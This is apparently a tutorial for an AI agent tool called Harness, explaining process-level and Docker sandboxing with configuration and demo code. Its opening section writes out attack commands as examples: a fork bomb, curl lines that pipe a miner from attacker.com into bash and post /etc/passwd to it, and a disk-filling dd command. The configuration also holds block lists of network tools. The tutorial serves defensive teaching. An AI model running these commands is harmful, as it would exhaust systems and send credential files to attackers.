Sandboxed Execution

Isolate AI agent commands with dual-mode sandboxing — process-level setrlimit or full Docker containers — with configurable resource limits.

Intermediate 20 min read

1Why Sandbox?

When you run harness --permission bypass, the agent executes commands without asking for confirmation. That is powerful and efficient — but without isolation, it also means the agent has unrestricted access to your system.

⚠ Without a Sandbox

harness --permission bypass gives an AI agent full access to your system. That includes network, filesystem, and processes. Consider what happens if the agent is given a malicious prompt or executes code from an untrusted source.

Real-world attack vectors that sandboxing prevents:

A fork bomb creates unlimited child processes, consuming all system resources and crashing the machine.

Bash

:(){ :|:& };:
# Sandbox prevents: max_processes limit blocks this immediately

A crypto miner installs and runs software in the background, consuming CPU indefinitely.

Bash

curl -s http://attacker.com/miner | bash
# Sandbox prevents: network blocked + blocked_commands includes curl

Data exfiltration sends sensitive files to an attacker-controlled server over the network.

Bash

curl attacker.com -d @/etc/passwd
# Sandbox prevents: network=none blocks all outbound connections

Disk fill creates an enormous file, consuming all available storage and crashing services.

Bash

dd if=/dev/zero of=bigfile bs=1G count=100
# Sandbox prevents: max_file_size_mb limit blocks writes above the cap

⚡ Most Configurable in Market

OpenHands has Docker-only sandbox. SWE-Agent has basic containers. No one offers dual-mode (process + Docker) with configurable resource limits like Harness.

Feature	Harness	OpenHands	SWE-Agent	Claude Code
Process sandbox (no Docker)	✓	✗	✗	✗
Docker sandbox	✓	✓	✓	✗
Memory limits	✓	Partial	✗	✗
CPU time limits	✓	✗	✗	✗
Process count limits	✓	✗	✗	✗
API key stripping	✓	✗	✗	✗
Blocked command list	✓	✗	✗	✗

2Process Sandbox

The process sandbox uses POSIX setrlimit system calls — the same mechanism the OS uses to enforce per-process resource limits. No Docker required.

Resource Limit	System Call	What It Controls
`max_memory_mb`	`RLIMIT_AS`	Total virtual memory the process can address
`max_cpu_seconds`	`RLIMIT_CPU`	CPU time before SIGXCPU / SIGKILL is sent
`max_processes`	`RLIMIT_NPROC`	Number of child processes the command can fork

ℹ max_file_size_mb is Docker-only

The max_file_size_mb limit is enforced only in Docker sandbox mode via the container runtime's storage limits. The process sandbox does not set RLIMIT_FSIZE — only RLIMIT_AS, RLIMIT_CPU, and RLIMIT_NPROC are applied.

Advantages

No Docker installation required
Minimal overhead — native OS calls
Works on Linux and macOS
Instant startup — no container spin-up

Limitations

Shared filesystem with host
Not as strong as container isolation
No network namespace separation
Suitable for trusted-but-resource-limited code

Bash

harness --sandbox process "Run the test suite"

3Docker Sandbox

The Docker sandbox runs every command in an isolated container. It provides the strongest isolation available — separate filesystem, network namespace, and process tree.

--network=none — no network access by default (unless network_access = true)
--memory — hard memory cap enforced by the container runtime
--cpus — CPU share limit
API key stripping — ANTHROPIC_API_KEY, OPENAI_API_KEY, AWS_SECRET_ACCESS_KEY, and others are removed from the environment automatically

ℹ API Key Stripping Applies to Both Modes

API keys are automatically stripped from the environment in both process and Docker sandbox modes. You cannot accidentally expose credentials to agent-executed commands regardless of which sandbox mode you use.

Advantages

Full filesystem isolation
Network namespace — --network=none
Strongest isolation available
Custom images for reproducible envs

Requirements

Docker must be installed
Docker daemon must be running
Slower startup than process mode
Image pull required on first use

Bash

harness --sandbox docker "Run the test suite"
# Requires: Docker installed and daemon running
# Default image: python:3.12-slim

4TOML Configuration

Configure sandboxing persistently in .harness/config.toml:

TOML .harness/config.toml

[sandbox]
enabled = true
mode = "process"              # "none", "process", or "docker"
max_memory_mb = 512           # Memory limit per command
max_cpu_seconds = 30          # CPU time limit per command
network_access = false        # Block network access
docker_image = "python:3.12-slim"  # Docker image (docker mode only)
allowed_paths = [
    "/home/user/project",     # Only allow access to project dir
    "/tmp",                   # And temp directory
]
blocked_commands = [
    "rm -rf /",               # Block dangerous commands
    "curl",                   # Block network tools
    "wget",
    "nc",
]

ℹ SandboxConfig vs SandboxPolicy

The TOML [sandbox] section maps to SandboxConfig — a simple, flat configuration dataclass used for file-based configuration. When the engine starts a session, it converts SandboxConfig into a SandboxPolicy (the runtime struct), which includes the nested ResourceLimits and NetworkPolicy sub-objects. If you are building pipelines programmatically, construct SandboxPolicy directly (see the Deep Dive below) rather than going through SandboxConfig.

The complete type hierarchy — use these dataclasses directly when building custom sandboxed pipelines:

Python

from harness.types.sandbox import (
    SandboxMode, SandboxPolicy, ResourceLimits, NetworkPolicy
)

# SandboxMode enum
# SandboxMode.NONE    = "none"     — no isolation
# SandboxMode.PROCESS = "process"  — setrlimit isolation
# SandboxMode.DOCKER  = "docker"   — container isolation

# ResourceLimits defaults
limits = ResourceLimits(
    max_memory_mb=512,    # 512MB virtual memory cap
    max_cpu_seconds=30,   # 30 seconds CPU time
    max_processes=64,     # 64 child processes
    max_file_size_mb=100, # 100MB per file written
)

# NetworkPolicy defaults
network = NetworkPolicy(
    allow_network=False,         # Block all network
    allowed_hosts=(),            # Allowlist (empty = block all)
    blocked_ports=(),            # Port blocklist
)

# Full SandboxPolicy
policy = SandboxPolicy(
    mode=SandboxMode.DOCKER,
    allowed_paths=("/home/user/project", "/tmp"),
    blocked_commands=("rm -rf", "curl", "wget", "nc"),
    resource_limits=limits,
    network=network,
    docker_image="python:3.12-slim",
    env_passthrough=("HOME", "PATH"),   # Pass these through to container
    # strip_env defaults (always stripped in both process and Docker modes):
    # ANTHROPIC_API_KEY, OPENAI_API_KEY, GOOGLE_API_KEY,
    # AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN
)

strip_env defaults are enforced in both process and Docker modes regardless of env_passthrough. You cannot accidentally pass API keys into the sandbox.

5Trigger Resource Limits

The script below demonstrates all four enforcement mechanisms with intentionally tight limits. Each test shows how ExecutionResult reports the failure:

Python sandbox_demo.py

# sandbox_demo.py — demonstrates sandbox resource limits
import asyncio
from harness.sandbox.executor import create_executor
from harness.types.sandbox import SandboxPolicy, SandboxMode, ResourceLimits

async def main():
    policy = SandboxPolicy(
        mode=SandboxMode.PROCESS,
        resource_limits=ResourceLimits(
            max_memory_mb=64,      # Very low — 64MB
            max_cpu_seconds=5,     # Very short — 5 seconds
            max_processes=8,       # Very few processes
        ),
        blocked_commands=("rm -rf", "curl", "wget"),
    )
    executor = create_executor(policy)

    # Test 1: Memory limit
    print("Test 1: Memory limit (64MB)...")
    result = await executor.execute("python3 -c \"x = 'a' * (100 * 1024 * 1024)\"")
    print(f"  Exit: {result.exit_code}, OOM: {result.oom_killed}")
    # Expected: oom_killed=True

    # Test 2: CPU timeout
    print("Test 2: CPU timeout (5s)...")
    result = await executor.execute("python3 -c \"while True: pass\"")
    print(f"  Exit: {result.exit_code}, Timed out: {result.timed_out}")
    # Expected: timed_out=True

    # Test 3: Blocked command
    print("Test 3: Blocked command...")
    error = executor.validate_command("rm -rf /")
    print(f"  Validation: {error}")
    # Expected: "Command blocked by sandbox policy"

    # Test 4: Normal execution
    print("Test 4: Normal execution...")
    result = await executor.execute("echo 'Hello from sandbox!'")
    print(f"  Output: {result.stdout.strip()}")
    print(f"  Exit: {result.exit_code}")
    # Expected: "Hello from sandbox!", exit_code=0

    await executor.cleanup()

asyncio.run(main())

Expected output for each test:

Test 1 — Memory OOM

Test 1: Memory limit (64MB)...
Exit: -9, OOM: True

Test 2 — CPU Timeout

Test 2: CPU timeout (5s)...
Exit: -24, Timed out: True

Test 3 — Blocked Command

Test 3: Blocked command...
Validation: Command blocked by sandbox policy

Test 4 — Normal Execution

Test 4: Normal execution...
Output: Hello from sandbox!
Exit: 0

ℹ ExecutionResult Fields

stdout — captured standard output
exit_code — process exit code (negative = killed by signal)
timed_out — True if CPU limit was exceeded
oom_killed — True if memory limit was exceeded
error — error message string if execution failed to start

6CLI Override

Override the configured sandbox mode for a single invocation using --sandbox. This does not modify config.toml — it applies only to that run:

Bash

# Override sandbox mode per invocation
harness --sandbox docker "Run untrusted tests"
harness --sandbox process "Quick analysis"
harness --sandbox none "Trusted local task"

▶ Try It

Run harness --sandbox process "print the output of: python3 -c 'import sys; print(sys.version)'" to verify the sandbox is active. The output will be the Python version inside the sandbox environment.

7Build an Untrusted Code Runner

Combine sandbox_mode="docker" with permission_mode="bypass" for a safe, fully-automated code execution pipeline. The Docker sandbox provides defense-in-depth even when the permission system is permissive:

Python untrusted_runner.py

# untrusted_runner.py
import asyncio
import harness

async def run_untrusted(code: str) -> str:
    """Run AI-generated code in a sandboxed environment."""
    prompt = f"""Execute this code and report the output:
```python
{code}
```
If the code fails, explain why and suggest a fix."""

    result_text = ""
    async for msg in harness.run(
        prompt,
        provider="anthropic",
        model="claude-sonnet-4-20250514",
        permission_mode="bypass",     # Auto-approve (safe because sandboxed)
        sandbox_mode="docker",        # Full Docker isolation
        max_turns=5,
    ):
        if isinstance(msg, harness.Result):
            result_text = msg.text

    return result_text

# Example usage
async def main():
    # Safe: sandboxed — even if the code is malicious
    output = await run_untrusted("""
import os
print(os.listdir('/'))
print(os.environ.get('ANTHROPIC_API_KEY', 'NOT FOUND'))
""")
    print(output)
    # API key will be "NOT FOUND" because sandbox strips it!

asyncio.run(main())

✓ Defense in Depth

Even with permission_mode='bypass', the Docker sandbox strips API keys (as does process mode), blocks network access, and limits resources. The agent cannot leak credentials or make external calls — regardless of what the code tries to do.

ℹ Default strip_env List

These environment variables are always stripped from the environment in both process and Docker sandbox modes:

Python

strip_env = (
    "ANTHROPIC_API_KEY",
    "OPENAI_API_KEY",
    "GOOGLE_API_KEY",
    "AWS_SECRET_ACCESS_KEY",
    "GITHUB_TOKEN",
)

You can extend this list via SandboxPolicy(strip_env=(..., "MY_SECRET")), but the defaults are always enforced — they cannot be overridden to pass through.

1

Code arrives from an untrusted source

User-submitted code, AI-generated scripts, or code fetched from a URL.
2

harness.run() starts a sandboxed session

Docker container spins up with --network=none and stripped environment.
3

Agent executes the code inside the container

Even malicious code cannot escape the container, access the network, or read API keys.
4

Output is returned safely to your application

Container is destroyed after execution — no persistent state remains.

8Next Steps

You now have sandboxed execution configured. Here is what to explore next:

Combine sandboxing with audit logging (Tutorial 06) — every sandboxed command is hash-chained in the audit trail
Use custom Docker images (docker_image = "myorg/my-env:latest") to match your production environment exactly
Set allowed_paths to restrict filesystem access to your project directory only
Explore Sub-Agents (Tutorial 08) — each sub-agent can run in its own sandbox with independent resource limits